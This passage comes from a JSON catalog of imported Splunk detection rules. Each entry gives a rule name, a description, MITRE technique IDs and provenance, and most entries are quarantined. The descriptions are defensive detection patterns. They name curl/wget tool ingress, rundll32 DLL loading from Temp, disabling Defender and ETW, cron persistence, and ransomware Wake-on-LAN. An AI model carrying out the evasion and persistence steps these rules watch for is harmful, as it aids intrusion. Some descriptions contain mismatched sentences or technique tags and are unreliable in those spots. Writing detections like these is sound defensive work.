AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51c04fdb-2746-465a-b86e-b413a09c9085", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-51c43b7b-e406-45d2-9bad-5c67f07e6528", "type": "detection", "name": "MacOS Hidden Files and Directories", "description": "The following analytic detects suspicious creation of hidden files and directories, which may indicate an attacker's attempt to conceal malicious activities or unauthorized data.\nHidden files and directories are often used to evade detection by security tools and administrators, providing a stealthy means for storing malware, logs, or sensitive information.\nBy monitoring for unusual or unauthorized creation of hidden files and directories, this analytic helps identify potential attempts to hide or unauthorized creation of hidden files and directories, and helps identify potential attempts to hide malicious operations, enabling security teams to uncover and address hidden threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-hidden-files-and-directories.yaml", "provenance": { "source": "splunk/security_content", "source_id": "51c43b7b-e406-45d2-9bad-5c67f07e6528", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_hidden_files_and_directories.yml" } }, { "id": "splunk-security-content-51fbcaf2-6259-11ec-b0f3-acde48001122", "type": "detection", "name": "Linux Add User Account", "description": "The following analytic detects the creation of new user accounts on Linux systems using commands like \"useradd\" or \"adduser.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries often create new user accounts to establish persistence on compromised hosts. If confirmed malicious, this could allow attackers to maintain access, escalate privileges, and further compromise the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-add-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51fbcaf2-6259-11ec-b0f3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_add_user_account.yml" } }, { "id": "splunk-security-content-520da6fa-7d5d-4a3b-9c61-1087517b8d0f", "type": "detection", "name": "Windows Rundll32 Load DLL in Temp Dir", "description": "This detection identifies instances where rundll32.exe is used to load a DLL from a temporary directory, such as C:\\Users\\\\AppData\\Local\\Temp\\ or C:\\Windows\\Temp\\. While rundll32.exe is a legitimate Windows utility used to execute functions exported from DLLs, its use to load libraries from temporary locations is highly suspicious. These directories are commonly used by malware and red team tools to stage payloads or execute code in-memory without writing it to more persistent locations. This behavior often indicates defense evasion, initial access, or privilege escalation, especially when the DLL is unsigned, recently written, or executed shortly after download. In normal user workflows, DLLs are not typically loaded from Temp paths, making this a high-fidelity indicator of potentially malicious activity. Monitoring this pattern is essential for detecting threats that attempt to blend in with native system processes while bypassing traditional application controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-load-dll-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "520da6fa-7d5d-4a3b-9c61-1087517b8d0f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_load_dll_in_temp_dir.yml" } }, { "id": "splunk-security-content-5211c260-820e-4366-b983-84bbfb5c263a", "type": "detection", "name": "Windows Impair Defense Change Win Defender Health Check Intervals", "description": "The following analytic detects modifications to the Windows registry that change the health check interval of Windows Defender. It leverages data from the Endpoint datamodel, specifically monitoring changes to the \"ServiceKeepAlive\" registry path with a value of \"0x00000001\". This activity is significant because altering Windows Defender settings can impair its ability to perform timely health checks, potentially leaving the system vulnerable. If confirmed malicious, this could allow an attacker to disable or delay security scans, increasing the risk of undetected malware or other malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-health-check-intervals.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5211c260-820e-4366-b983-84bbfb5c263a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml" } }, { "id": "splunk-security-content-523c2684-a101-11eb-916b-acde48001122", "type": "detection", "name": "Schedule Task with HTTP Command Arguments", "description": "The following analytic detects the creation of scheduled tasks on Windows systems that include HTTP command arguments, using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService with HTTP in their command arguments. This behavior is significant as it often indicates malware activity or the use of Living off the Land binaries (lolbins) to download additional payloads. If confirmed malicious, this activity could lead to data exfiltration, malware propagation, or unauthorized access to sensitive information, necessitating immediate investigation and mitigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schedule-task-with-http-command-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "523c2684-a101-11eb-916b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schedule_task_with_http_command_arguments.yml" } }, { "id": "splunk-security-content-52b48e8b-eb6e-48b0-b8f1-73273f6b134e", "type": "detection", "name": "Windows WPDBusEnum Registry Key Modification", "description": "This analytic is used to identify when a USB removable media device is attached to a Windows host. In this scenario we are querying the Endpoint Registry data model to look for modifications to the Windows Portable Device keys HKLM\\SOFTWARE\\Microsoft\\Windows Portable Devices\\Devices\\ or HKLM\\System\\CurrentControlSet\\Enum\\SWD\\WPDBUSENUM\\ . Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wpdbusenum-registry-key-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52b48e8b-eb6e-48b0-b8f1-73273f6b134e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wpdbusenum_registry_key_modification.yml" } }, { "id": "splunk-security-content-52f6d751-1fd4-4c74-a4c9-777ecfeb5c58", "type": "detection", "name": "Linux Adding Crontab Using List Parameter", "description": "The following analytic detects suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt to establish persistence or execute malicious code on a schedule. If confirmed malicious, the impact could include unauthorized code execution, data destruction, or other damaging outcomes. Further investigation should analyze the added cron job, its associated command, and any related processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-adding-crontab-using-list-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52f6d751-1fd4-4c74-a4c9-777ecfeb5c58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_adding_crontab_using_list_parameter.yml" } }, { "id": "splunk-security-content-52fd468b-cb6d-48f5-b16a-92f1c9bb10cf", "type": "detection", "name": "Linux Ingress Tool Transfer Hunting", "description": "The following analytic detects the use of 'curl' and 'wget' commands within a Linux environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, user information, and command-line executions. This activity is significant as 'curl' and 'wget' are commonly used for downloading files, which can indicate potential ingress of malicious tools. If confirmed malicious, this activity could lead to unauthorized code execution, data exfiltration, or further compromise of the system. Monitoring and tuning this detection helps identify and differentiate between normal and potentially harmful usage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ingress-tool-transfer-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "52fd468b-cb6d-48f5-b16a-92f1c9bb10cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ingress_tool_transfer_hunting.yml" } }, { "id": "splunk-security-content-535cb214-8b47-11ec-a2c7-acde48001122", "type": "detection", "name": "Linux System Network Discovery", "description": "The following analytic identifies potential enumeration of local network configuration on Linux systems.\nIt detects this activity by monitoring processes such as \"arp,\" \"ifconfig,\" \"ip,\" \"netstat,\" \"firewall-cmd,\" \"ufw,\" \"iptables,\" \"ss,\" and \"route\" within a 30-minute window.\nThis behavior is significant as it often indicates reconnaissance efforts by adversaries to gather network information for subsequent attacks.\nIf confirmed malicious, this activity could enable attackers to map the network, identify vulnerabilities, and plan further exploitation or lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-system-network-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "535cb214-8b47-11ec-a2c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_system_network_discovery.yml" } }, { "id": "splunk-security-content-535fd4fc-7151-4062-9d7e-e896bea77bf6", "type": "detection", "name": "Windows Query Registry UnInstall Program List", "description": "The following analytic detects an access request on the uninstall registry key. It leverages Windows Security Event logs, specifically event code 4663. This activity is significant because adversaries or malware can exploit this key to gather information about installed applications, aiding in further attacks. If confirmed malicious, this behavior could allow attackers to map out installed software, potentially identifying vulnerabilities or software to exploit, leading to further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-query-registry-uninstall-program-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "535fd4fc-7151-4062-9d7e-e896bea77bf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_query_registry_uninstall_program_list.yml" } }, { "id": "splunk-security-content-538d0152-7aaa-11eb-beaa-acde48001122", "type": "detection", "name": "Ryuk Wake on LAN Command", "description": "The following analytic detects the use of Wake-on-LAN commands associated with Ryuk ransomware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process and command-line activities. This behavior is significant as Ryuk ransomware uses Wake-on-LAN to power on devices in a compromised network, increasing its encryption success rate. If confirmed malicious, this activity could lead to widespread ransomware encryption across multiple endpoints, causing significant operational disruption and data loss. Immediate isolation and thorough investigation of the affected endpoints are crucial to mitigate the impact.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ryuk-wake-on-lan-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "538d0152-7aaa-11eb-beaa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ryuk_wake_on_lan_command.yml" } }, { "id": "splunk-security-content-53b4c927-5ec4-47cd-8aed-d4b303304f87", "type": "detection", "name": "Windows ESX Admins Group Creation Security Event", "description": "This analytic detects creation, deletion, or modification of the \"ESX Admins\" group in Active Directory. These events may indicate attempts to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-security-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "53b4c927-5ec4-47cd-8aed-d4b303304f87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_security_event.yml" } }, { "id": "splunk-security-content-5434f670-155d-11ec-8cca-acde48001122", "type": "detection", "name": "Get WMIObject Group Discovery", "description": "The following analytic detects the use of the `Get-WMIObject Win32_Group` command executed via PowerShell to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Identifying local groups can be a precursor to privilege escalation or lateral movement. If confirmed malicious, this activity could allow an attacker to map out group memberships, aiding in further exploitation or unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-wmiobject-group-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5434f670-155d-11ec-8cca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_wmiobject_group_discovery.yml" } }, { "id": "splunk-security-content-5456bdef-d765-4565-8e1f-61ca027bc50d", "type": "detection", "name": "Zscaler Privacy Risk Destinations Threat Blocked", "description": "The following analytic identifies blocked destinations within a network that are deemed privacy risks by Zscaler. It leverages web proxy logs, focusing on entries marked as \"Privacy Risk.\" Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant for a SOC as it helps monitor and manage privacy risks, ensuring a secure network environment. If confirmed malicious, this activity could indicate attempts to access or exfiltrate sensitive information, posing a significant threat to data privacy and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-privacy-risk-destinations-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5456bdef-d765-4565-8e1f-61ca027bc50d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_privacy_risk_destinations_threat_blocked.yml" } }, { "id": "splunk-security-content-5456bdef-d765-4565-8e1f-61ca027bc50e", "type": "detection", "name": "Zscaler Employment Search Web Activity", "description": "The following analytic identifies web activity related to employment searches within a network. It leverages Zscaler web proxy logs, focusing on entries categorized as 'Job/Employment Search'. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This detection is significant for SOCs as it helps monitor potential insider threats by identifying users who may be seeking new employment. If confirmed malicious, this activity could indicate a risk of data exfiltration or other insider threats, potentially leading to sensitive information leakage or other security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-employment-search-web-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5456bdef-d765-4565-8e1f-61ca027bc50e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_employment_search_web_activity.yml" } }, { "id": "splunk-security-content-54a6ed00-3256-11ec-b031-acde48001122", "type": "detection", "name": "CMD Carry Out String Command Parameter", "description": "The following analytic detects the use of `cmd.exe /c` to execute commands, a technique often employed by adversaries and malware to run batch commands or invoke other shells like PowerShell. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. Monitoring this activity is crucial as it can indicate script-based attacks or unauthorized command execution. If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmd-carry-out-string-command-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54a6ed00-3256-11ec-b031-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmd_carry_out_string_command_parameter.yml" } }, { "id": "splunk-security-content-54c95f4d-3e5d-44be-9521-ea19ba62f7a8", "type": "detection", "name": "Linux c89 Privilege Escalation", "description": "The following analytic detects the execution of the 'c89' command with elevated privileges, which can be used to compile and execute C programs as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events that include command-line arguments. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute arbitrary commands as root. If confirmed malicious, this could lead to full system compromise, enabling the attacker to gain root access and execute any command with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-c89-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54c95f4d-3e5d-44be-9521-ea19ba62f7a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_c89_privilege_escalation.yml" } }, { "id": "splunk-security-content-54dc1265-2f74-4b6d-b30d-49eb506a31b3", "type": "detection", "name": "Protocol or Port Mismatch", "description": "The following analytic identifies network traffic where the higher layer protocol does not match the expected port, such as non-HTTP traffic on TCP port 80. It leverages data from network traffic inspection technologies like Bro or Palo Alto Networks firewalls. This activity is significant because it may indicate attempts to bypass firewall restrictions or conceal malicious communications. If confirmed malicious, this behavior could allow attackers to evade detection, maintain persistence, or exfiltrate data through commonly allowed ports, posing a significant threat to network security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/protocol-or-port-mismatch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54dc1265-2f74-4b6d-b30d-49eb506a31b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/protocol_or_port_mismatch.yml" } }, { "id": "splunk-security-content-54fa06c5-96a2-4406-a4a7-44d93ddbd173", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection From Process With No Args", "description": "This analytic detects system binaries that are commonly abused in process injection techniques but are observed without any command-line arguments.\nIt leverages Cisco Network Visibility Module (NVM) flow data and process arguments\nto identify outbound connections initiated by curl where TLS checks were explicitly disabled.\nBinaries such as `rundll32.exe`, `regsvr32.exe`, `dllhost.exe`, `svchost.exe`, and others are legitimate Windows processes that are often injected into by malware or post-exploitation frameworks (e.g., Cobalt Strike) to hide execution.\nWhen these processes are seen initiating a network connection with an empty or missing command line, it can indicate\npotential injection and communication with a command and control server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-from-process-with-no-args.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "54fa06c5-96a2-4406-a4a7-44d93ddbd173", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_from_process_with_no_args.yml" } }, { "id": "splunk-security-content-5521f8c5-1aa3-473c-9eb7-853701924a06", "type": "detection", "name": "Azure AD Privileged Graph API Permission Assigned", "description": "The following analytic detects the assignment of high-risk Graph API permissions in Azure AD, specifically Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All, and RoleManagement.ReadWrite.Directory. It uses azure_monitor_aad data to scan AuditLogs for 'Update application' operations, identifying when these permissions are assigned. This activity is significant as it grants broad control over Azure AD, including application and directory settings. If confirmed malicious, it could lead to unauthorized modifications and potential security breaches, compromising the integrity and security of the Azure AD environment. Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-graph-api-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5521f8c5-1aa3-473c-9eb7-853701924a06", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_graph_api_permission_assigned.yml" } }, { "id": "splunk-security-content-55349868-5583-466f-98ab-d3beb321961e", "type": "detection", "name": "AWS Console Login Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts to the AWS Console during the Multi-Factor Authentication (MFA) challenge. It leverages AWS CloudTrail logs, specifically the `additionalEventData` field, to detect when MFA was used but the login attempt still failed. This activity is significant as it may indicate an adversary attempting to access an account with compromised credentials but being thwarted by MFA. If confirmed malicious, this could suggest an ongoing attempt to breach the account, potentially leading to unauthorized access and further attacks if MFA is bypassed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-console-login-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55349868-5583-466f-98ab-d3beb321961e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_console_login_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-553d0429-1a1c-44bf-b3f5-a8513deb9ee5", "type": "detection", "name": "Hunting 3CXDesktopApp Software", "description": "The following analytic detects the presence of any version of the 3CXDesktopApp, also known as the 3CX Desktop App, on Mac or Windows systems. It leverages the Endpoint data model's Processes node to identify instances of the application running, although it does not provide file version information. This activity is significant because 3CX has identified vulnerabilities in versions 18.12.407 and 18.12.416, which could be exploited by attackers. If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hunting-3cxdesktopapp-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "553d0429-1a1c-44bf-b3f5-a8513deb9ee5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hunting_3cxdesktopapp_software.yml" } }, { "id": "splunk-security-content-55502381-5cce-491b-9277-7cb1d10bc0df", "type": "detection", "name": "Windows Registry Dotnet ETW Disabled Via ENV Variable", "description": "The following analytic detects a registry modification that disables the ETW for the .NET Framework. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the COMPlus_ETWEnabled registry value under the \"Environment\" registry key path for both user (HKCU\\Environment) and machine (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment) scopes. This activity is significant because disabling ETW can allow attackers to evade Endpoint Detection and Response (EDR) tools and hide their execution from audit logs. If confirmed malicious, this action could enable attackers to operate undetected, potentially leading to further compromise and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-dotnet-etw-disabled-via-env-variable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55502381-5cce-491b-9277-7cb1d10bc0df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_dotnet_etw_disabled_via_env_variable.yml" } }, { "id": "splunk-security-content-555cc358-bf16-4e05-9b3a-0f89c73b7261", "type": "detection", "name": "Linux Auditd Hidden Files And Directories Creation", "description": "The following analytic detects suspicious creation of hidden files and directories, which may indicate an attacker's attempt to conceal malicious activities or unauthorized data. Hidden files and directories are often used to evade detection by security tools and administrators, providing a stealthy means for storing malware, logs, or sensitive information. By monitoring for unusual or unauthorized creation of hidden files and directories, this analytic helps identify potential attempts to hide or unauthorized creation of hidden files and directories, this analytic helps identify potential attempts to hide malicious operations, enabling security teams to uncover and address hidden threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 